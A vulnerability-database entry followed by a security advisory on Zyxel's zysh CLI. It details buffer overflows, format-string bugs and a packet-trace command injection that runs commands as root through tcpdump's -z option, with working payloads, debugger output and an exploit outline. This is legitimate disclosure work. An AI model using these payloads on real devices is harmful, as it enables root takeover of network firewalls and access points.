            "url": "https://nvd.nist.gov/vuln/detail/cve-2023-33009"
          },
          {
            "trust": 0.8,
            "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2023-33009/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2023-33009"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-007635"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202305-2094"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-33009"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2023-33009"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-007635"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202305-2094"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-33009"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-05-24T00:00:00",
            "db": "VULMON",
            "id": "CVE-2023-33009"
          },
          {
            "date": "2023-11-24T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2023-007635"
          },
          {
            "date": "2023-05-24T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202305-2094"
          },
          {
            "date": "2023-05-24T13:15:09.560000",
            "db": "NVD",
            "id": "CVE-2023-33009"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-05-24T00:00:00",
            "db": "VULMON",
            "id": "CVE-2023-33009"
          },
          {
            "date": "2023-11-24T08:10:00",
            "db": "JVNDB",
            "id": "JVNDB-2023-007635"
          },
          {
            "date": "2023-06-16T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202305-2094"
          },
          {
            "date": "2024-04-01T15:51:48.877000",
            "db": "NVD",
            "id": "CVE-2023-33009"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202305-2094"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0ZyXEL\u00a0 Classic buffer overflow vulnerability in the product",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-007635"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202305-2094"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202205-1790

    Vulnerability from variot - Updated: 2024-02-13 01:28

    Multiple improper input validation flaws were identified in some CLI commands of Zyxel USG/ZyWALL series firmware versions 4.09 through 4.71, USG FLEX series firmware versions 4.50 through 5.21, ATP series firmware versions 4.32 through 5.21, VPN series firmware versions 4.30 through 5.21, NSG series firmware versions 1.00 through 1.33 Patch 4, NXC2500 firmware version 6.10(AAIG.3) and earlier versions, NAP203 firmware version 6.25(ABFA.7) and earlier versions, NWA50AX firmware version 6.25(ABYW.5) and earlier versions, WAC500 firmware version 6.30(ABVS.2) and earlier versions, and WAX510D firmware version 6.30(ABTF.2) and earlier versions, that could allow a local authenticated attacker to cause a buffer overflow or a system crash via a crafted payload. --[ HNS-2022-02 - HN Security Advisory - https://security.humanativaspa.it/

    • Title: Multiple vulnerabilities in Zyxel zysh
    • Products: Zyxel firewalls, AP controllers, and APs
    • Author: Marco Ivaldi marco.ivaldi@hnsecurity.it
    • Date: 2022-06-07
    • CVE Names and Vendor CVSS Scores: CVE-2022-26531: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H (6.1) CVE-2022-26532: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (7.8)
    • Advisory URLs: https://github.com/hnsecurity/vulns/blob/main/HNS-2022-02-zyxel-zysh.txt https://www.zyxel.com/support/multiple-vulnerabilities-of-firewalls-AP-controllers-and-APs.shtml

    --[ 0 - Table of contents

    1 - Summary 2 - Background 3 - Vulnerabilities 4 - Analysis 4.1 - Buffer overflows in the "configure terminal > diagnostic" command 4.2 - Buffer overflow in the "debug" command 4.3 - Buffer overflow in the "ssh" command 4.4 - Format string bugs in the "extension" argument of some commands 4.5 - OS command injection in the "packet-trace" command 5 - Exploitation 5.1 - Buffer overflows 5.2 - Format string bugs 5.3 - OS command injection 6 - Affected products 7 - Remediation 8 - Disclosure timeline 9 - References

    --[ 1 - Summary

    "We live on a placid island of ignorance in the midst of black seas of infinity, and it was not meant that we should voyage far." -- H. P. Lovecraft, The Call of Cthulhu

    We have identified multiple security vulnerabilities in the zysh binary that implements the command-line interface (CLI) on a wide range of Zyxel products, including their security appliances such as those in the Unified Security Gateway (USG) product line:

    • Multiple stack-based buffer overflows in the code responsible for handling diagnostic tests ("configure terminal > diagnostic" command).
    • A stack-based buffer overflow in the "debug" command.
    • A stack-based buffer overflow in the "ssh" command.
    • Multiple format string bugs in the "extension" argument of the "ping", "ping6", "traceroute", "traceroute6", "nslookup", and "nslookup6" commands.
    • An OS command injection vulnerability in the "packet-trace" command.

    We demonstrated the possibility to exploit the format string bugs and the OS command injection vulnerability to escape the restricted shell environment and achieve arbitrary command execution on the underlying embedded Linux OS, respectively as regular user and as root.

    --[ 2 - Background

    The zysh binary is a restricted shell that implements the command-line interface (CLI) on multiple Zyxel [0] products. All regular user accounts have an /etc/passwd entry similar to the following:

    admin:x:10007:10000:Administration account...:/etc/zyxel/ftp:/bin/zysh

    Only the root user and the reserved debug account, disabled by default, have access to a proper bash shell:

    root:x:0:0:root&admin&120&120&480&480&1&0:/root:/bin/bash ... debug:!:0:0:Debug Account:/root:/bin/bash

    The Zyxel CLI can be accessed via SSH as follows:

    raptor@blumenkraft ~ % ssh -l admin (admin@) Password: Router> # hello zysh!

    On our Zyxel USG20-VPN test device, the CLI can also be accessed via Telnet (not enabled by default) or via the so-called Web Console, implemented with WebSockets, that is reachable with a web browser after authentication, at a URL such as the following:

    https:///webconsole/

    In the context of a wider audit of the security posture of Zyxel devices [1], we decided to audit zysh with the primary goal of escaping the restricted shell environment and executing arbitrary commands on the underlying embedded Linux OS. It is pretty large for a dynamically-linked, stripped binary (~19MB) and it makes plenty of unsafe API function calls, which makes it an interesting target.

    --[ 3 - Vulnerabilities

    During our audit of the zysh binary, we identified the following vulnerabilities:

    • Multiple stack-based buffer overflows in the code responsible for handling diagnostic tests ("configure terminal > diagnostic" command).
    • A stack-based buffer overflow in the "debug" command.
    • A stack-based buffer overflow in the "ssh" command.
    • Multiple format string bugs in the "extension" argument of the "ping", "ping6", "traceroute", "traceroute6", "nslookup", and "nslookup6" commands.
    • An OS command injection vulnerability in the "packet-trace" command.

    All buffer overflows can be triggered only by admin users, while the format string bugs and the command injection vulnerability are exploitable by authenticated users of either admin or limited-admin type.

    --[ 4 - Analysis

    To follow along with our detailed vulnerability analysis, you can download the Zyxel Firmware 5.10 for "USG20-VPN - ABAQ - Non-Wireless Edition" (USG20-VPN_5.10.zip [2]). Extract the ZIP archive, then extract the password-protected ZIP archive 510ABAQ0C0.bin contained within, using the following password [1]:

    4ulPPIs94jnYwUfwwoTqz/a5eRHFRwNYq8zFTrQZaE7XkoTgdzWc.6jea1v1zJb

    Finally, extract the Squashfs filesystem image with binwalk or a similar tool, e.g.:

    raptor@blumenkraft 510ABAQ0C0 % binwalk -e compress.img

    The target binary we will reference throughout our analysys is /bin/zysh, available in the extracted filesystem:

    raptor@blumenkraft bin % ls -l zysh -rwxr-xr-x 1 raptor staff 19727292 Sep 23 18:33 zysh* raptor@blumenkraft bin % shasum -a 256 zysh 47ee711a817e33bb2809e91d76b512498ae3cdca1276a2385f404384547404e3 zysh raptor@blumenkraft bin % file zysh zysh: ELF 32-bit MSB executable, MIPS, N32 MIPS64 rel2 version 1 (SYSV), dynamically linked, interpreter /lib32/ld.so.1, for GNU/Linux 2.6.9, stripped

    You can easily import it in your favorite disassembler. In Ghidra, we had to manually tweak the import options to reflect that the binary was compiled for the N32 ABI [3], importing it as "MIPS:BE:64:64-32addr:n32". The same requirement holds for any other binaries compiled for the Cavium Octeon III processor, on which our Zyxel USG20-VPN test device is based.

    --[ 4.1 - Buffer overflows in the "configure terminal > diagnostic" command

    The first buffer overflow vulnerability we identified is located in the function at 0x1013b238, which we dubbed do_emtap():

    undefined8 do_emtap(longlong argc, char argv) { ... char acStack305[129]; ... else { uVar1 = 1; if (argc == 3) { sprintf(acStack305 + 1, "t%s.sh", argv[2]); / VULN #1 / pcVar4 = argv[1]; do_emtap_test(pcVar4, acStack305 + 1); do_emtap_test2(pcVar4, acStack305 + 1); report_test(); uVar1 = 0; } } return uVar1; }

    This function is called when an admin user invokes the diagnostic test functionality in the Zyxel CLI with two arguments, e.g.:

    Router> configure terminal Router(config)# diagnostic test

    The buffer overflow happens due to the unsafe sprintf() call marked with the "VULN #1" comment above, which overflows past the boundary of the acStack305 array allocated on the stack with the contents of the argument.

    Upon exploitation, however, the return statement at 0x1013b2f4 is never reached, because the overflow propagates to the other functions that are called by do_emtap(), which we dubbed do_emtap_test() and do_emtap_test2() in the pseudo-code above. More precisely, another overflow happens at the sprintf() call below marked as "VULN #2", located in the do_emtap_test() function at 0x1013a8f8. This overflow enables us to gain control over the pc register when do_emtap_test() returns:

    int do_emtap_test(char test_name, char test_num) { ... char acStack320[128]; char acStack192[128]; ... sprintf(acStack320, "%s/%s", "/tmp/tap", test_name); / VULN #3 / mkdir(acStack320, 0x1c0); sprintf(acStack192, "%s/%s/%s", "/usr/local/emtap/test_script", test_name, test_num); / VULN #2 / iVar1 = access(acStack192, 0); if (iVar1 != 0) { return 1; } ... }

    The unsafe sprintf() call overflows past the boundary of the acStack192 array. When do_emtap_test() returns, we are able hijack the control flow. However, we can only use numeric characters in our hostile buffer, therefore exploitation is extremely unlikely, if at all possible. The overflow can be triggered with the following payload:

    Router> configure terminal Router(config)# diagnostic test anything 1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 Program received signal SIGBUS, Bus error. 0x31313130 in ?? ()

    A slightly better opportunity for exploitation is represented by another stack-based buffer overflow in the above function, marked with the "VULN

    3" comment. This specific overflow can be triggered with the following

    payload:

    Router> configure terminal Router(config)# diagnostic test AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 1 Program received signal SIGBUS, Bus error. 0x41414140 in ?? ()

    This time, our hostile buffer can contain alphanumeric characters in the range [a-zA-Z0-9], plus the underscore '_'. Still far from ideal, but definitely better than the previously identified exploitation vector.

    A similar vector is provided by yet another stack-based buffer overflow, this time in the function located at 0x1013ada0, which we dubbed do_emtap_test3():

    undefined8 do_emtap_test3(char test_name) { ... char acStack288[127]; ... sprintf(acStack288, "%s %s/%s | %s -E \'t[0-9]+\.sh\' > %s", "/bin/ls", "/usr/local/emtap/test_script", test_name, "/bin/grep", "/tmp/tap/test_case_dir.tmp"); / VULN #4 */ system(acStack288); ... sprintf(acStack288, "%s %s", "/bin/rm", "/tmp/tap/test_case_dir.tmp"); system(acStack288); return 0; } ... }

    This function is called when an admin user invokes the diagnostic test functionality in the Zyxel CLI with only one argument, e.g.:

    Router> configure terminal Router(config)# diagnostic test

    This time, the unsafe sprintf() call marked with the "VULN #4" comment overflows past the boundary of the acStack288 array. By exploiting this overflow, we can once again overwrite the pc register and hijack the control flow. In order to trigger this overflow, the following payload can be used:

    Router> configure terminal Router(config)# diagnostic test AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /bin/ls: cannot access /usr/local/emtap/test_script/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: No such file or directory Program received signal SIGBUS, Bus error. 0x41414140 in ?? ()

    In the mentioned functions, including the one located at 0x1013aa10 that we dubbed do_emtap_test2() and that is not immediately reachable via the codepaths triggered by our hostile inputs, there are other instances of buffer overflow caused by the unchecked use of unsafe API functions, such as sprintf() and strcpy(). We have not deeply investigated their actual reachability, but they should be fixed as well. In addition, many unsafe programming constructs are present in the rest of the binary.

    --[ 4.2 - Buffer overflow in the "debug" command

    The buffer overflow vulnerability we identified in the code responsible for handling the "debug" command is located in the function at 0x1000df70, which we dubbed do_debug().

    It is a pretty long function that gets called when an admin (or in some cases a limited-admin) user invokes the debug functionality in the Zyxel CLI, e.g.:

    Router> debug

    To trigger the overflow, the following payload can be used:

    Router> debug gui webhelp redirect AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Router> debug gui show webhelp redirect Program received signal SIGBUS, Bus error. 0x41414140 in ?? ()

    The first command writes a long string in the /tmp/webhelppath file:

    int do_debug(ulonglong argc, char argv) { ... case 0x155: if (DAT_1145e55c != 0x150) { return 0; } pcVar11 = "/tmp/webhelppath"; if (DAT_1145e564 != 0x154) { return 0; } LAB_1000ebdc: pFVar12 = fopen64(pcVar11, "w"); / open file / ... fputs(argv[4], pFVar12); / write string to file / fclose(pFVar12); return 0; }

    The second command triggers the overflow by reading from the /tmp/webhelppath file:

    int do_debug(ulonglong argc, char argv) { ... undefined8 local_e0; ... if (lVar24 == 0x155) { pFVar12 = fopen64("/tmp/webhelppath", "r"); ... __isoc99_fscanf(pFVar12, "%s", &local_e0); / VULN #5 / fclose(pFVar12); fwrite(&DAT_1013fe18, 1, 9, stdout); puVar22 = &local_e0; pcVar11 = "Webhelp redirect: %s\n"; } LAB_1000f7d0: fprintf(stdout, pcVar11, puVar22); fwrite(&DAT_1013fe48, 1, 2, stdout); return 0; }

    The vulnerability lies in the use of the unsafe __isoc99_fscanf() API function, which does not check if the destination string is large enough to accommodate the whole source string. This allows us to overwrite the saved return address and hijack the control flow. Our hostile buffer is limited to a length of 255 bytes and can contain only alphanumeric characters in the range [a-zA-Z0-9], plus the underscore '_', dash '-', and dot '.' special characters.

    A similar bug can be triggered with the "debug gui kb redirect" and "debug gui show kb redirect" command combination. However, in this case, the destination buffer is too far away from the location where the return address is saved on the stack, therefore we cannot exploit this bug to control the pc register. We do not exclude other ways to exploit this vulnerability.

    --[ 4.3 - Buffer overflow in the "ssh" command

    The buffer overflow vulnerability we identified in the code responsible for handling the "ssh" command is located in the function at 0x10012298, which we dubbed do_ssh():

    undefined8 do_ssh(int argc, char argv) { ... char acStack336[300]; ... sprintf(acStack336, "/usr/bin/ssh -o UserKnownHostsFile=/dev/null %s", argv[1]); / VULN #5 / ... sVar4 = strlen(acStack336); sprintf(acStack336 + sVar4, " -p %s", (undefined4 )((int)argv + iVar2)); / VULN #6 / ... }

    You know the gist by now: there are two stack-based buffer overflows caused by the unchecked use of the unsafe API function sprintf(). To trigger the first overflow the following payload can be used, as an authenticated admin or limited-admin user:

    Router> ssh AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@127.0.0.1 The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established. RSA key fingerprint is SHA256:fzNloEaOsmNQLHbhjroUVHkJC9ZTH09A6TRjyK+oiys. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '127.0.0.1' (RSA) to the list of known hosts. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@127.0.0.1's password: [press enter a few times] Program received signal SIGBUS, Bus error. 0x41414140 in ?? ()

    Once again, our hostile buffer can contain only alphanumeric characters, plus some special characters. As a side note, we noticed that we can inject arguments that get passed to the underlying /usr/bin/ssh command, albeit with some limitations:

    Router> ssh -@127.0.0.1 unknown option -- @ usage: ssh [-46AaCfGgKkMNnqsTtVvXxYy] [-B bind_interface] [-b bind_address] [-c cipher_spec] [-D [bind_address:]port] [-E log_file] [-e escape_char] [-F configfile] [-I pkcs11] [-i identity_file] [-J [user@]host[:port]] [-L address] [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port] [-Q query_option] [-R address] [-S ctl_path] [-W host:port] [-w local_tun[:remote_tun]] destination [command]

    Based on our analysis, this lack of input filtering is not exploitable to inject interesting command-line arguments (e.g. "-o ProxyCommand=..."):

    Router> ssh -oProxyCommand@127.0.0.1 command-line: line 0: Bad configuration option: proxycommand@127.0.0.1 Router> ssh -oProxyCommand=@127.0.0.1 % (after 'ssh'): Parse error retval = -1 ERROR: Parse error/command not found!

    --[ 4.4 - Format string bugs in the "extension" argument of some commands

    Some zysh commands implement a special "extension" argument that allows to specify arbitrary command-line arguments to be passed to the invoked OS command that underlies each functionality:

    Router> ping 127.0.0.1 ; count extension forever interface size source |

    For instance, if we enter the following zysh command:

    Router> ping 127.0.0.1 extension -c 1

    The OS command line below will be executed via the function located at 0x101295d0, which we dubbed my_invoke():

    $ /bin/zysudo.suid /bin/ping 1.1.1.1 -n -c 3 -c 1

    As you can see, the additional arguments we specified after the "extension" keyword are appended to the OS command line.

    We identified format string bugs in the following zysh commands:

    • "ping" and "ping6" commands, handled by the function at 0x1000c0a0, which we dubbed do_ping().
    • "traceroute" and "traceroute6" commands, handled by the function at 0x1000bc58, which we dubbed do_traceroute().
    • "nslookup" and "nslookup6" commands, handled by the function at 0x1000c718, which we dubbed do_nslookup().

    The relevant pseudo-code snippets are:

    undefined8 do_ping(int argc, char argv, char cmd) { ... if (iVar9 != 0) { sVar5 = strlen(acStack880); pcVar1 = ppcStack96[iVar9 + 1]; acStack880[sVar5] = ' '; acStack880[sVar5 + 1] = '\0'; strcpy(acStack880 + sVar5 + 1, pcVar1); / append extension args / } if (iVar8 == 0) { sprintf(acStack4976, acStack880); / VULN: format string bug */ __pid = fork(); ... }

    undefined8 do_traceroute(int argc, char argv, char cmd) { ... if (iVar10 != 0) { sVar6 = strlen(acStack864); pcVar2 = argv[iVar10 + 1]; acStack864[sVar6] = ' '; acStack864[sVar6 + 1] = '\0'; strcpy(acStack864 + sVar6 + 1, pcVar2); / append extension args / } ... LAB_1000be10: sprintf(acStack4960,acStack864); / VULN: format string bug */ __pid = fork(); ... }

    undefined8 do_nslookup(int argc, char argv) { ... pcVar4 = stpcpy((char )((int)&uStack832 + sVar3 + 1), (char )((int)argv + iVar2)); if (iVar8 != 0) { pcVar4[1] = '\0'; pcVar4 = ' '; strcpy(pcVar4 + 1, argv[iVar8 + 1]); / append extension args / } ... sprintf(acStack4928, (char )&uStack832); / VULN: format string bug / __pid = fork(); ... }

    As a side note, in the "nslookup" and "nslookup6" commands there is also a bonus stack-based buffer overflow that is not large enough to reach the saved return address. It can be reproduced with the following payload:

    Router> nslookup AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA server AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA extension AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Program received signal SIGBUS, Bus error. 0x1000ba10 in _ftext () (gdb) x/i $pc => 0x1000ba10 <_ftext+17776>: lw v1,-10184(s0) (gdb) i r s0 s0: 0x4141414141414141

    To reproduce the format string bugs and leak stack memory contents or crash zysh, instead, the following payloads can be used:

    Router> # stack memory leak Router> ping 127.0.0.1 extension %x%x%x%x ping: unknown host 6eb83a7580808080fefeff001145e560 Router> # crash Router> ping 127.0.0.1 extension %n%n%n%n Program received signal SIGSEGV, Segmentation fault. 0x77bf6768 in vfprintf () from /lib32/libc.so.6 (gdb) bt

    0 0x77bf6768 in vfprintf () from /lib32/libc.so.6

    1 0x77c14f44 in vsprintf () from /lib32/libc.so.6

    2 0x77bfd980 in sprintf () from /lib32/libc.so.6

    3 0x1000c38c in _ftext () << do_ping()

    ... Router> # crash Router> ping6 ::1 extension %n%n%n%n Program received signal SIGSEGV, Segmentation fault. 0x77bf6768 in vfprintf () from /lib32/libc.so.6

    Router> # crash Router> traceroute 127.0.0.1 extension %n%n%n%n Program received signal SIGSEGV, Segmentation fault. 0x77bf6768 in vfprintf () from /lib32/libc.so.6 (gdb) bt

    0 0x77bf6768 in vfprintf () from /lib32/libc.so.6

    1 0x77c14f44 in vsprintf () from /lib32/libc.so.6

    2 0x77bfd980 in sprintf () from /lib32/libc.so.6

    3 0x1000be18 in _ftext () << do_traceroute()

    ... Router> # crash Router> traceroute6 ::1 extension %n%n%n%n Program received signal SIGSEGV, Segmentation fault. 0x77bf6768 in vfprintf () from /lib32/libc.so.6

    Router> # stack memory leak Router> nslookup 127.0.0.1 extension %x%x%x%x Using domain server: Name: 127.0.0.1 Address: 127.0.0.1#53 Aliases:

    Host 0bd01390 not found: 3(NXDOMAIN) Router> # crash Router> nslookup 127.0.0.1 extension %n%n%n%n

    Program received signal SIGSEGV, Segmentation fault. 0x77bf6768 in vfprintf () from /lib32/libc.so.6 (gdb) bt

    0 0x77bf6768 in vfprintf () from /lib32/libc.so.6

    1 0x77c14f44 in vsprintf () from /lib32/libc.so.6

    2 0x77bfd980 in sprintf () from /lib32/libc.so.6

    3 0x1000c8c0 in _ftext () << do_nslookup()

    ... Router> # crash Router> nslookup6 ::1 extension %n%n%n%n Program received signal SIGSEGV, Segmentation fault. 0x77bf6768 in vfprintf () from /lib32/libc.so.6

    We just confirmed that we control the format strings passed as argument to the sprintf() API function in different locations of our target binary.

    --[ 4.5 - OS command injection in the "packet-trace" command

    The OS command injection we identified in the code responsible for handling the "packet-trace" command is located in the function at 0x10010258, which we dubbed do_packet-trace().

    This function builds the command line for the /usr/sbin/tcpdump binary, based on the arguments with which the "packet-trace" command is invoked. The available arguments are:

    Router# packet-trace ; dst-host duration extension-filter file interface ip-proto ipv6-proto port src-host |

    The "extension-filter" argument is particularly interesting, because it allows to specify additional arbitrary command-line arguments to be passed to tcpdump. For instance, if we enter the following zysh command:

    Router# packet-trace extension-filter -ln -i lo -w -a -W 1 -G 1 -z id

    The OS command line below will be executed via the function located at 0x101295d0, which we dubbed my_invoke():

    $ /usr/sbin/tcpdump -n -i eth0 -ln -i lo -w -a -W 1 -G 1 -z id

    As you can see, we are using a variation of a well-known GTFOBins payload [4] that allows us to execute the following OS command (yes, command-line switches that begin with a '-' are accepted):

    $ id -a

    Refer to the manual page of tcpdump [5] for further details on how each command-line switch is interpreted. Seeing it all in action from the Web Console, as an authenticated admin or limited-admin user:

    Router# packet-trace extension-filter -ln -i lo -w -a -W 1 -G 1 -z id tcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 65535 bytes Maximum file limit reached: 1 1 packet captured 2 packets received by filter 0 packets dropped by kernel uid=0(root) gid=0(root) groups=0(root)

    We got arbitrary command execution as root! We just need to find a way to exploit it to escape the restricted shell environment.

    --[ 5 - Exploitation

    In the following sections, we will discuss exploitation of the identified vulnerabilities.

    --[ 5.1 - Buffer overflows

    The zysh binary is in a sorry state when it comes to modern countermeasures against exploitation of memory corruption bugs:

    • No RELRO
    • No stack canary
    • NX disabled
    • No PIE
    • Has RWX segments

    That said, it looks like the buffer overflow vulnerabilities described in this advisory cannot be exploited to achieve arbitrary code execution after all, despite our gut feeling... In summary:

    • MIPS alphanumeric shellcode is not a thing [6].
    • A pure ROP chain is also not feasible, at least with the memory mapping used by the device and firmware version combination that we could test.

    We can solve the first problem by storing our shellcode (along with a copious number of NOP-equivalent opcodes) in the value of the TERM environment variable that gets passed to the remote system via sshd (or in.telnetd). At this point, we still need to be able to overwrite the stored return address with a value that points to our NOP sled and shellcode payload, though. Unfortunately, a partial overwrite would not work in this case, because our target architecture is big endian and therefore we would only be able to overwrite the most significant byte(s), achieving nothing of note. On a device and firmware combination with a slightly different memory mapping, however, we might be able to pull this off and hijack the control flow.

    We are not well-versed in the fine and obscure art of MIPS shellcoding and exploitation, so we might have missed something. Feel free to try this challenge on your own!

    As a final note, we also looked into the possibility to exploit the many unsafe calls to system() present in the code in order to inject arbitrary OS commands. However, we could not slip past the pretty aggressive input filters implemented by zysh. Too bad.

    --[ 5.2 - Format string bugs

    As discussed earlier, we control the format strings passed as argument to the sprintf() API function in different locations of our target binary. As a proof of concept, this allowed us to leak stack memory contents and crash zysh.

    It is now time to see if we are able to exploit the identified format string bugs to execute arbitrary code and escape the restricted shell environment... At first glance, this does not look feasible, because once again we are limited in the characters that we can use in our hostile buffer (alphanumeric characters plus some special characters in the 7-bit ASCII set).

    However, we devised a workaround: instead of placing our retloc addresses at the beginning of the hostile format string as is customary, we can inject them in the process memory via the TERM environment variable! The direct parameter access feature of glibc, together with our very own format string exploitation technique for RISC architectures [7], will do the rest.

    Long story short, we put together a proof-of-concept exploit [8] that does the following:

    • Authenticate and access the target zysh via SSH, injecting our payload (retloc sled + NOP sled + shellcode + padding) via the TERM environment variable.

    • Leak a stack address via the format string bug in the "ping" command, and use it to calculate the address of our injected shellcode near the bottom of the stack, which changes slightly at each zysh execution.

    • Craft another hostile format string to use as an argument to the "ping" command and overwrite the .got entry of fork(), which gets called right after the vulnerable sprintf(), with the shellcode address, using a variation of our write-one-byte-at-a-time technique designed for RISC architectures such as MIPS and SPARC.

